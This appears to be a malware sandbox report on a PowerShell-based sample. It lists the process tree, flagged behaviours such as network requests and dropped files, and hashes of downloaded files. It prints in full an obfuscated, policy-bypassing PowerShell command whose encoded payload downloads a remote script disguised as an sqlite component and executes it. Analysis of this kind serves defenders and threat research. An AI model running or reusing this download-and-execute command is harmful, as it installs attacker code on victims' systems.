C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1308
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
3bf94725719ec5750b483938d2348d11
SHA151e63027827a49e365f6a9b8eacfa1644274ddc2
SHA25625ccfebd9988deaeaa6475ec0aee5a99b6d6963cbb81696f02e46e5bf00f8633
SHA5120235d1f1694b13d84b5eebba40c44dda58846d88f6fcfd53848fe1be891fe3bbb37651f4f8990d6bda0b32ca5915c3567dd9c482b192d5b6b4ea1e52b392789d
-
MD5
24e035aed3fb84e31fba40ebad14d5fc
SHA1ff44a45d2b201e9ea0a100fded0bbd7109960732
SHA2568a0a82a5165e3e99ae434b26d7da61ef3e3c67040dd064a619c19d08891055e6
SHA512bd1d08e67d574fee2624a3a5ac0abbb250af35799165014811adb896d8060a42d0a827fc2032a8b8db0e8d31807ab05fad260bab3c1ebad71e854587b1586f05
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
90c8165a2ca1c584008751e6604aac5f
SHA1c1b2545af59ec7acdec29e91c667aa74a12b9742
SHA2562099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974
SHA5129d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0
-
MD5
ab03bfea4a86420ff3861466a14b7468
SHA1ed4c20e6ef609efcdbb21366a84529f7bb6debd9
SHA256ff5de951b80826dced583b409701414480f10bbd06785ca8817422643eb8a676
SHA512bb6ccde3c1492ead794b4c55856e7af30c248fcfc9d33b54dce5be5bded6f86629139b26acbb53bf9d0c2f0e440bd913e6b2e993254cb8aef3863b368dbef87a
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
0334a0d31f037a51598e0811051cb2e6
SHA10efae6b6b10bacb9d4ef31fa86dbc489e06918a5
SHA25655a496494222ca4de90d9791857f0627535de50bc4df063929f42133fc289121
SHA51279c39640840e7004d8c1526c372e4d8aec2ced9167c3e0c2d72d0237a6c3a3d198f349ff024c589d7cb8d63194e4ef99b5641fd55928b8206caac72731b88f66
-
MD5
615f99f0e93e2cc4c6a3a572835fd63d
SHA1c383f93e9a47adc4d4b265fadfcc3feaf0980a91
SHA256bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8
SHA512dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba
-
MD5
5b49a655bf1bd6bcb3551bb1cba2a97b
SHA1a32f1358093e7e3d8ab6abcc286fc2d92a501f78
SHA25640bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca
SHA5127de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a